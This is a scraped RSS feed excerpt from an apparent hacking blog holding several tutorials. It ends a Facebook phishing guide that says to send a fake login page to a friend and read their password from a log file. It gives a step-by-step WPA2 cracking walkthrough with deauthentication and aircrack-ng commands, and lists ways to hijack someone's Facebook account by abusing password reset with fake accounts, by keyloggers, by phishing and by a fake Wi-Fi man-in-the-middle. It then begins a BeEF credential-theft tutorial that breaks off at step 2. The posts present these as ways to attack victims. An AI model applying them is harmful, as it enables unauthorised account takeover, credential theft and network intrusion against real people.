&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;14) then once u uploaded, send the url to your friend and they will see your site. they login and you can see their password in the log.txt file. just open the log.txt&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;h2 style=&quot;color: #54565b; font-family: Muli, Helvetica, Arial, Georgia, &amp;quot;Times New Roman&amp;quot;; font-size: 20px; font-weight: normal; margin: 0px 0px 10px; text-align: justify;&quot;&gt;
Countermeasures :&lt;/h2&gt;
&lt;div style=&quot;color: #54565b; font-family: Muli, Helvetica, Arial, Georgia, &amp;quot;Times New Roman&amp;quot;; font-size: 14px; text-align: justify;&quot;&gt;
1. Look carefully the address when you open a&amp;nbsp;&lt;strong class=&quot;StrictlyAutoTagBold&quot;&gt;website&lt;/strong&gt;&amp;nbsp;that ask for your credentials. It&#39;s better you type it by yourself&amp;nbsp;&lt;img alt=&quot;😛&quot; class=&quot;emoji&quot; draggable=&quot;false&quot; src=&quot;https://s.w.org/images/core/emoji/2.4/svg/1f61b.svg&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border: none !important; box-shadow: none !important; display: inline !important; height: 1em !important; margin: 0px 0.07em !important; max-width: 100%; padding: 0px !important; vertical-align: -0.1em !important; width: 1em !important;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;color: #54565b; font-family: Muli, Helvetica, Arial, Georgia, &amp;quot;Times New Roman&amp;quot;; font-size: 14px; text-align: justify;&quot;&gt;
2. Change your&amp;nbsp;&lt;strong class=&quot;StrictlyAutoTagBold&quot;&gt;password&lt;/strong&gt;&amp;nbsp;(and all the same&amp;nbsp;&lt;strong class=&quot;StrictlyAutoTagBold&quot;&gt;password&lt;/strong&gt;:e-mail, twitter, etc) ASAP when you know this attack happen&lt;/div&gt;
&lt;div style=&quot;color: #54565b; font-family: Muli, Helvetica, Arial, Georgia, &amp;quot;Times New Roman&amp;quot;; font-size: 14px; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;color: #54565b; font-family: Muli, Helvetica, Arial, Georgia, &amp;quot;Times New Roman&amp;quot;; font-size: 14px; text-align: justify;&quot;&gt;
3.Install URL advisor(usually this you can get from antivirus for free) but not too effective.&lt;/div&gt;
&lt;div style=&quot;color: #54565b; font-family: Muli, Helvetica, Arial, Georgia, &amp;quot;Times New Roman&amp;quot;; font-size: 14px; text-align: justify;&quot;&gt;
Hope you found it useful&amp;nbsp;&lt;img alt=&quot;🙂&quot; class=&quot;emoji&quot; draggable=&quot;false&quot; src=&quot;https://s.w.org/images/core/emoji/2.4/svg/1f642.svg&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border: none !important; box-shadow: none !important; display: inline !important; height: 1em !important; margin: 0px 0.07em !important; max-width: 100%; padding: 0px !important; vertical-align: -0.1em !important; width: 1em !important;&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;clear: both;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;post-footer&quot; style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.6; margin: 1.5em 0px 0px;&quot;&gt;
&lt;div class=&quot;post-footer-line post-footer-line-1&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;post-author vcard&quot; style=&quot;margin-left: 0px; margin-right: 1em; margin-right: 1em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;post-timestamp&quot; style=&quot;margin-left: -1em; margin-left: -1em; margin-right: 1em; margin-right: 1em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;reaction-buttons&quot; style=&quot;margin-right: 1em; margin-right: 1em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;post-comment-link&quot; style=&quot;margin-right: 1em; margin-right: 1em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;post-backlinks post-comment-link&quot; style=&quot;margin-right: 1em; margin-right: 1em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;post-icons&quot; style=&quot;margin-right: 1em; margin-right: 1em;&quot;&gt;&lt;/span&gt;&lt;div class=&quot;post-share-buttons goog-inline-block&quot; style=&quot;display: inline-block; margin-right: 0px; margin-top: 0.5em; position: relative; vertical-align: middle;&quot;&gt;
&lt;a class=&quot;goog-inline-block share-button sb-email&quot; href=&quot;https://www.blogger.com/share-post.g?blogID=751485297506074302&amp;amp;pageID=6073421865907088917&amp;amp;target=email&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: url(&amp;quot;/img/share_buttons_20_3.png&amp;quot;) !important; background-origin: initial !important; background-position: 0px 0px !important; background-repeat: no-repeat !important; background-size: initial !important; display: inline-block; height: 20px; margin-left: -1px; overflow: hidden; position: relative; text-decoration-line: none; width: 20px;&quot; target=&quot;_blank&quot; title=&quot;Email This&quot;&gt;&lt;span class=&quot;share-button-link-text&quot; style=&quot;display: block; text-indent: -9999px;&quot;&gt;Email This&lt;/span&gt;&lt;/a&gt;&lt;a class=&quot;goog-inline-block share-button sb-blog&quot; href=&quot;https://www.blogger.com/share-post.g?blogID=751485297506074302&amp;amp;pageID=6073421865907088917&amp;amp;target=blog&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: url(&amp;quot;/img/share_buttons_20_3.png&amp;quot;) !important; background-origin: initial !important; background-position: -20px 0px !important; background-repeat: no-repeat !important; background-size: initial !important; display: inline-block; height: 20px; margin-left: -1px; overflow: hidden; position: relative; text-decoration-line: none; width: 20px;&quot; target=&quot;_blank&quot; title=&quot;BlogThis!&quot;&gt;&lt;span class=&quot;share-button-link-text&quot; style=&quot;display: block; text-indent: -9999px;&quot;&gt;BlogThis!&lt;/span&gt;&lt;/a&gt;&lt;a class=&quot;goog-inline-block share-button sb-twitter&quot; href=&quot;https://www.blogger.com/share-post.g?blogID=751485297506074302&amp;amp;pageID=6073421865907088917&amp;amp;target=twitter&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: url(&amp;quot;/img/share_buttons_20_3.png&amp;quot;) !important; background-origin: initial !important; background-position: -40px 0px !important; background-repeat: no-repeat !important; background-size: initial !important; display: inline-block; height: 20px; margin-left: -1px; overflow: hidden; position: relative; text-decoration-line: none; width: 20px;&quot; target=&quot;_blank&quot; title=&quot;Share to Twitter&quot;&gt;&lt;span class=&quot;share-button-link-text&quot; style=&quot;display: block; text-indent: -9999px;&quot;&gt;Share to Twitter&lt;/span&gt;&lt;/a&gt;&lt;a class=&quot;goog-inline-block share-button sb-facebook&quot; href=&quot;https://www.blogger.com/share-post.g?blogID=751485297506074302&amp;amp;pageID=6073421865907088917&amp;amp;target=facebook&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: url(&amp;quot;/img/share_buttons_20_3.png&amp;quot;) !important; background-origin: initial !important; background-position: -60px 0px !important; background-repeat: no-repeat !important; background-size: initial !important; display: inline-block; height: 20px; margin-left: -1px; overflow: hidden; position: relative; text-decoration-line: none; width: 20px;&quot; target=&quot;_blank&quot; title=&quot;Share to Facebook&quot;&gt;&lt;span class=&quot;share-button-link-text&quot; style=&quot;display: block; text-indent: -9999px;&quot;&gt;Share to Facebook&lt;/span&gt;&lt;/a&gt;&lt;a class=&quot;goog-inline-block share-button sb-pinterest&quot; href=&quot;https://www.blogger.com/share-post.g?blogID=751485297506074302&amp;amp;pageID=6073421865907088917&amp;amp;target=pinterest&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: url(&amp;quot;/img/share_buttons_20_3.png&amp;quot;) !important; background-origin: initial !important; background-position: -100px 0px !important; background-repeat: no-repeat !important; background-size: initial !important; display: inline-block; height: 20px; margin-left: -1px; overflow: hidden; position: relative; text-decoration-line: none; width: 20px;&quot; target=&quot;_blank&quot; title=&quot;Share to Pinterest&quot;&gt;&lt;span class=&quot;share-button-link-text&quot; style=&quot;display: block; text-indent: -9999px;&quot;&gt;Share to Pinterest&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>https://kryptonhackingworld.blogspot.com/2018/05/hack-facebook-with-phishing-techniques.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg58FZCGwh4D2D0mk1J_1dQjGu_MB_tsv_M9_Rg4EJWiwS0xGDaC69CRvmMvlM7Rto6BoISn1Q5hhwULTR_PCgLk1Z7vopNktdC8-TgrWaxGMB9NSYW8JFSLMmQrd3eTjwDIQmw3kWkr07K/s72-c/download+%25281%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-904298795328474112</guid><pubDate>Mon, 28 May 2018 08:54:00 +0000</pubDate><atom:updated>2018-05-28T01:54:08.273-07:00</atom:updated><title>Cracking WPA2-PSK Passwords Using Aircrack-Ng</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhWGkDNrms52rCGsGU2MdXGB4yTs6y4vjEDN-6PQGkdq2Kdpp4snhHCkVt5IXimcvFh83dNK2wEF-gu23Z0uvtMpVB-iWvrVps5Gdp37W22pUSIxNhEDGBWIOT964MHFPVI8rAkZHka9HG/s1600/download.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;300&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhWGkDNrms52rCGsGU2MdXGB4yTs6y4vjEDN-6PQGkdq2Kdpp4snhHCkVt5IXimcvFh83dNK2wEF-gu23Z0uvtMpVB-iWvrVps5Gdp37W22pUSIxNhEDGBWIOT964MHFPVI8rAkZHka9HG/s1600/download.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Cracking WPA2-PSK Passwords Using Aircrack-Ng&lt;br /&gt;
&lt;br /&gt;
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.&lt;br /&gt;
In this tutorial from our Wi-Fi &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Hacking series, we&#39;ll look at using aircrack-ng and a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you&#39;re looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.&lt;br /&gt;
&lt;b&gt;STEP 1 Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Let&#39;s start by putting our wireless adapter in monitor mode.&lt;br /&gt;
For this to work, we&#39;ll need to use a compatible wireless network adapter. Check out our 2017 list of Kali Linux and Backtrack compatible wireless network adapters in the link above, or you can grab our most popular adapter for beginners here.&lt;br /&gt;
This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let&#39;s open a terminal and type:&lt;br /&gt;
airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Note that airmon-ng has renamed your wlan0 adapter to mon0.&lt;br /&gt;
&lt;b&gt;STEP 2 Capture Traffic with Airodump-Ng&lt;/b&gt;&lt;br /&gt;
Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.&lt;br /&gt;
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let&#39;s do this by typing:&lt;br /&gt;
airodump-ng mon0&lt;br /&gt;
&lt;b&gt;STEP 3 Focus Airodump-Ng on One AP on One Channel&lt;/b&gt;&lt;br /&gt;
Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let&#39;s open another terminal and type:&lt;br /&gt;
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB_nrAIoWo4-GWOw14oTM0OJmc70h3PjW7ixrmOVGNbt0KrvHy3wvWuvei576Y_ecMyOYG-48VBbciuQR39dHvn_GOK4JLvkWiMKTjacMdhRkmyoXXTJQcoliQa398B95PL6NzdQ84cA_O/s1600/635131972618725638.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;232&quot; data-original-width=&quot;751&quot; height=&quot;98&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB_nrAIoWo4-GWOw14oTM0OJmc70h3PjW7ixrmOVGNbt0KrvHy3wvWuvei576Y_ecMyOYG-48VBbciuQR39dHvn_GOK4JLvkWiMKTjacMdhRkmyoXXTJQcoliQa398B95PL6NzdQ84cA_O/s320/635131972618725638.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
08:86:30:74:22:76 is the BSSID of the AP&lt;br /&gt;
-c 6 is the channel the AP is operating on&lt;br /&gt;
WPAcrack is the file you want to write to&lt;br /&gt;
mon0 is the monitoring wireless adapter*&lt;br /&gt;
As you can see in the screenshot above, we&#39;re now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don&#39;t spend much effort securing their AP.&lt;br /&gt;
&lt;b&gt;STEP 4 Aireplay-Ng Deauth&lt;/b&gt;&lt;br /&gt;
In order to capture the encrypted password, we need to have the client authenticate against the AP. If they&#39;re already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let&#39;s open another terminal and type:&lt;br /&gt;
aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0&lt;br /&gt;
100 is the number of de-authenticate frames you want to send&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfriajwiIkdzAwfXoNfUjyFmhQRvi-4nZuujOtwClg9YfrEzMgYJ5QlSWMhnPdpzOv3qqO6o85obC2J0tQ6nfii126Wq3UBlEhdy4hSToOa5UJUmDt5Lc3g7jM4ZmH6fkBGoXoSlGy4PAv/s1600/STEP4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;237&quot; data-original-width=&quot;560&quot; height=&quot;135&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfriajwiIkdzAwfXoNfUjyFmhQRvi-4nZuujOtwClg9YfrEzMgYJ5QlSWMhnPdpzOv3qqO6o85obC2J0tQ6nfii126Wq3UBlEhdy4hSToOa5UJUmDt5Lc3g7jM4ZmH6fkBGoXoSlGy4PAv/s320/STEP4.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
08:86:30:74:22:76 is the BSSID of the AP&lt;br /&gt;
mon0 is the monitoring wireless adapter&lt;br /&gt;
&lt;b&gt;STEP 5 Capture the Handshake&lt;/b&gt;&lt;br /&gt;
In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let&#39;s go back to our airodump-ng terminal and check to see whether or not we&#39;ve been successful.&lt;br /&gt;
&lt;b&gt;STEP 6 Let&#39;s Aircrack-Ng That Password!&lt;/b&gt;&lt;br /&gt;
Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I&#39;ll be using the default password list included with aircrack-ng on BackTrack named darkcOde.&lt;br /&gt;
We&#39;ll now attempt to crack the password by opening another terminal and typing:&lt;br /&gt;
aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFQSKK8dilFZnul6kXiQ9Ta9tFBHcYy1wvXjuRK5BhlluD2DrCmst-Q1y_hQuJErVGo_dEKjsS6lAR9BahZKQW2bbQ1lZTG1pGxXJ6UbXl8LsGBOfa-ZcHEkfY1VeYXU1ahryi6ahK1E9F/s1600/STEP6.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;449&quot; data-original-width=&quot;773&quot; height=&quot;185&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFQSKK8dilFZnul6kXiQ9Ta9tFBHcYy1wvXjuRK5BhlluD2DrCmst-Q1y_hQuJErVGo_dEKjsS6lAR9BahZKQW2bbQ1lZTG1pGxXJ6UbXl8LsGBOfa-ZcHEkfY1VeYXU1ahryi6ahK1E9F/s320/STEP6.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command&lt;br /&gt;
/pentest/passwords/wordlist/darkc0de is the absolute path to your password file&lt;br /&gt;
&lt;b&gt;How Long Will It Take?&lt;/b&gt;&lt;br /&gt;
This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it&#39;s capable of testing a little over 500 passwords per second.&lt;br /&gt;
&lt;br /&gt;
When the password is found, it&#39;ll appear on your screen. Remember, the password file is critical. Try the default password file first and if it&#39;s not successful, advance to a larger, more complete password file such as one of these.&lt;br /&gt;
&lt;br /&gt;
CrackStation&#39;s Password Cracking Dictionary&lt;br /&gt;
SkullSecurity&#39;s Password Dictionaries</description><link>https://kryptonhackingworld.blogspot.com/2018/05/cracking-wpa2-psk-passwords-using.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhWGkDNrms52rCGsGU2MdXGB4yTs6y4vjEDN-6PQGkdq2Kdpp4snhHCkVt5IXimcvFh83dNK2wEF-gu23Z0uvtMpVB-iWvrVps5Gdp37W22pUSIxNhEDGBWIOT964MHFPVI8rAkZHka9HG/s72-c/download.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-6516580844910070701</guid><pubDate>Mon, 28 May 2018 08:12:00 +0000</pubDate><atom:updated>2018-05-28T01:13:19.930-07:00</atom:updated><title>BEST WAYS TO CRACK FACEBOOK PASSWORDS</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie9tWvv-BvTGrcdfDYYMgSqXlcj2qxqLLz0I5m0tNNZ_QwYnExbMDUz62o4PEI6jHex34JmZ6lFi-9215d85meueDuTnDK_PS5GFrf0bklsrnPV6OESu6OREEdj-ouTU-7Mue242pZ5w0K/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;154&quot; data-original-width=&quot;328&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie9tWvv-BvTGrcdfDYYMgSqXlcj2qxqLLz0I5m0tNNZ_QwYnExbMDUz62o4PEI6jHex34JmZ6lFi-9215d85meueDuTnDK_PS5GFrf0bklsrnPV6OESu6OREEdj-ouTU-7Mue242pZ5w0K/s320/images.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;METHOD 1 Reset the Password&lt;/b&gt;&lt;br /&gt;
The easiest way to &quot;hack&quot; into someone&#39;s Facebook is through resetting the password. This could be easier done by people who are friends with the person they&#39;re trying to hack.&lt;br /&gt;
The first step would be to get your friend&#39;s Facebook email login. If you don&#39;t already know it, try looking on their Facebook page in the &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Contact Info section.&lt;br /&gt;
Next, click on Forgotten your password? and type in the victim&#39;s email. Their account should come up. Click This is my account.&lt;br /&gt;
It will ask if you would like to reset the password via the victim&#39;s emails. This doesn&#39;t help, so press No longer have access to these?&lt;br /&gt;
It will now ask How can we reach you? Type in an email that you have that also isn&#39;t linked to any other Facebook account.&lt;br /&gt;
It will now ask you a question. If you&#39;re close friends with the victim, that&#39;s great. If you don&#39;t know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.&lt;br /&gt;
If you don&#39;t figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.&lt;br /&gt;
It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;METHOD 2 Use a Keylogger&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Software Keylogger&lt;/b&gt;&lt;br /&gt;
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim&#39;s computer.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Hardware Keylogger&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim&#39;s computer. The USB drive will save a summary of the keystrokes, so&lt;br /&gt;
it&#39;s as simple as plugging it to your own computer and extracting the data.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;METHOD 3 Phishing&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This option is much more difficult than the rest, but it is also the most common method to hack someone&#39;s account.&lt;br /&gt;
&amp;nbsp;The most popular type of phishing involves creating a fake login page.&lt;br /&gt;
The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;METHOD 4 Man in the Middle Attack&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you can get close to your target, you can trick them into connecting to a fake Wi-Fi network to steal credentials via a Man In The Middle (MITM) attack.&lt;br /&gt;
Tools like the Wi-Fi Pumpkin make creating a fake Wi-Fi network is as easy as sticking a $16 Wireless Network Adapter on the $35 Raspberry Pi and getting close to your target. Once the victim connects to your fake network, you can inspect the traffic or route them to fake login pages. You can even set it to only replace certain pages and leave other pages alone.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>https://kryptonhackingworld.blogspot.com/2018/05/best-ways-to-crack-facebook-passwords.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie9tWvv-BvTGrcdfDYYMgSqXlcj2qxqLLz0I5m0tNNZ_QwYnExbMDUz62o4PEI6jHex34JmZ6lFi-9215d85meueDuTnDK_PS5GFrf0bklsrnPV6OESu6OREEdj-ouTU-7Mue242pZ5w0K/s72-c/images.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-648173877270383037</guid><pubDate>Mon, 28 May 2018 07:14:00 +0000</pubDate><atom:updated>2018-05-28T00:14:56.263-07:00</atom:updated><title>How to Get Facebook Credentials using BEEF</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4BBpB4xACppQAHYRCx6edgfuhV1XGD3H2_hxM_ih3CaOIP9nNUdlHMX9S-n4wshMF9I7AiAgcqulefaA_3lhHBzbqt0Z8qp3KzIdXW5DGVzuAJ6aZSnW1UGMzVphDdclDYcHrjtOFL0Ne/s1600/hack-like-pro-hack-web-browsers-with-beef.w1456.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;320&quot; data-original-width=&quot;598&quot; height=&quot;171&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4BBpB4xACppQAHYRCx6edgfuhV1XGD3H2_hxM_ih3CaOIP9nNUdlHMX9S-n4wshMF9I7AiAgcqulefaA_3lhHBzbqt0Z8qp3KzIdXW5DGVzuAJ6aZSnW1UGMzVphDdclDYcHrjtOFL0Ne/s320/hack-like-pro-hack-web-browsers-with-beef.w1456.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;background-color: white; color: #383838; font-family: &amp;quot;Slabo 27px&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; text-align: justify; word-spacing: 1.7px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;background-color: white; color: #383838; font-family: &amp;quot;Slabo 27px&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; text-align: justify; word-spacing: 1.7px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;background-color: white; color: #383838; font-family: &amp;quot;Slabo 27px&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; text-align: justify; word-spacing: 1.7px;&quot;&gt;Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you&amp;nbsp;&lt;/span&gt;&lt;em style=&quot;background: rgb(255, 255, 255); border: 0px; color: #383838; font-family: &amp;quot;Slabo 27px&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: 1.7px;&quot;&gt;can&lt;/em&gt;&lt;span style=&quot;background-color: white; color: #383838; font-family: &amp;quot;Slabo 27px&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; text-align: justify; word-spacing: 1.7px;&quot;&gt;&amp;nbsp;get Facebook credentials. That&#39;s what this tutorial is all about.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;step 1&lt;/b&gt;- Install Kali (If You Haven&#39;t Done So Already)&lt;br /&gt;
&lt;b&gt;step 2&lt;/b&gt; - Open BeEF&lt;br /&gt;
You can login to BeEF by using the username beef and the password beef.&lt;br /&gt;
You will then by greeted by BeEF&#39;s &quot;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Getting Started&quot; screen.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
